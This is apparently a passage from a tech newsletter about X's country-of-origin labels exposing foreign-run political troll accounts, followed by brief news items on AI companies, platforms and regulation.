Why we’re following: One of Elon Musk’s promises during the takeover of Twitter was to purge the platform of inauthentic accounts. But several studies have shown that suspected inauthentic activity has remained at about the same levels. X has long struggled with troll farms spreading misinformation, boosted by its tendency to monetarily reward engagement.
There’s also an irony in the fact that revealing the origins of ragebait-posting political accounts like these was once the subject of groundbreaking research by the Stanford Internet Observatory and other academic researchers. But the effort outraged Republicans, which then sued them over their contacts with the government about information operations like these and largely succeeded in stopping the work.
What people are saying: Accusations of foreign actors spreading fake news flew on both sides of the aisle. When the feature appeared to be pulled for a short period of time, Republican Gov. Ron DeSantis of Florida said “X needs to reinstate country-of-origin — it helps expose the grift.”
In a post that garnered 3.2 million views, @greg16676935420 attached a screenshot of @AmericanGuyX’s profile, which shows the account’s based in India: “BREAKING: American guy is not actually an American guy.”
“When an American billionaire offers money to people from relatively poor countries for riling up and radicalising Americans, it’s not surprising that they’ll take up the offer,” @ChrisO_wiki wrote in a post that garnered nearly 700,000 views.
In perhaps the most devastating consequence of the feature, @veespo_444s said they “spent 2 years acting mysterious over what country I live in just for Elon to fuck it all up with a single update” in a post that has 4.3 million views and 90,000 likes.
How President Trump amplifies right-wing trolls and AI memes. The crypto crash has taken about $1 billion out of the Trump family fortune.
Gamers are using Fortnite and GTA to prepare for ICE raids. How Democrats are building their online strategy to catch up with Republicans.
In the last month, Elon Musk has posted more about politics than about his companies on X.
Hundreds of English-language websites link to articles from a pro-Kremlin disinformation network and are being used to “groom” AI chatbots into spreading Russian propaganda, a study found.
Sam Altman and Jony Ive said they’re now prototyping their hardware device, but it remains two years away. An in-depth look at OpenAI’s mental health crisis after GPT-4o details how the company changed ChatGPT after reports of harmful interactions. OpenAI safety research leader Andrea Vallone, who led ChatGPT’s responses to mental health crises, is reportedly leaving. A review of ChatGPT’s new personal shopping agent.
Anthropic unveiled Claude Opus 4.5, which it said is the best model for software engineering. Other highlights from the launch: it outscored human engineering candidates on a take-home exam, is cheaper than Opus 4.1, can keep a chat going indefinitely via ongoing summarization of past chats, and is harder to trick with prompt injection.
In other research, AI models can unintentionally develop misaligned behaviors after learning to cheat, Anthropic said. (This won an approving tweet from Ilya Sutskever, who hadn’t posted about AI on X in more than a year.)
Why Meta’s $27 billion data center and its debt won’t be on its balance sheet. Meta is venturing into electricity trading to speed up its power plant construction. Facebook Groups now has a nickname feature for anonymous posting.
A judge is set to decide on remedies for Google’s adtech monopoly next year. Italy closed its probe into Google over unfair practices that used personal data. Google stock closed at a record high last week after the successful launch of Gemini 3. AI Mode now has ads.
Something for the AI skeptics: Google must double its serving capacity every six months to meet current demand for AI services, Google Cloud VP Amin Vahdat said.
AI demand has strained the memory chip supply chain, chipmakers said.
Amazon has more than 900 data centers — more than previously known — in more than 50 countries. Its Autonomous Threat Analysis system uses specialized AI agents for debugging. AWS said it would invest $50 billion in AI capabilities for federal agencies.
Twitch was added to Australia’s list of platforms banned for under-16s. Pinterest was spared.
Grindr said it ended talks on a $3.5 billion take-private deal, citing uncertainty over financing.
Interviews with AI quality raters who are telling their friends and family not to use the tech. How AI is threatening the fundamental method of online survey research by evading bot detection techniques. Insurers are looking to limit their liability on claims related to AI. Another look at how America’s economy is now deeply tied to AI stocks and their performance.
Scientists built an AI model that can flag human genetic mutations likely to cause disease.
For more good posts every day, follow Casey’s Instagram stories.
Send us tips, comments, questions, and your questions for the tech CEOs: casey@platformer.news. Read our ethics policy here.
...
Read the original on www.platformer.news »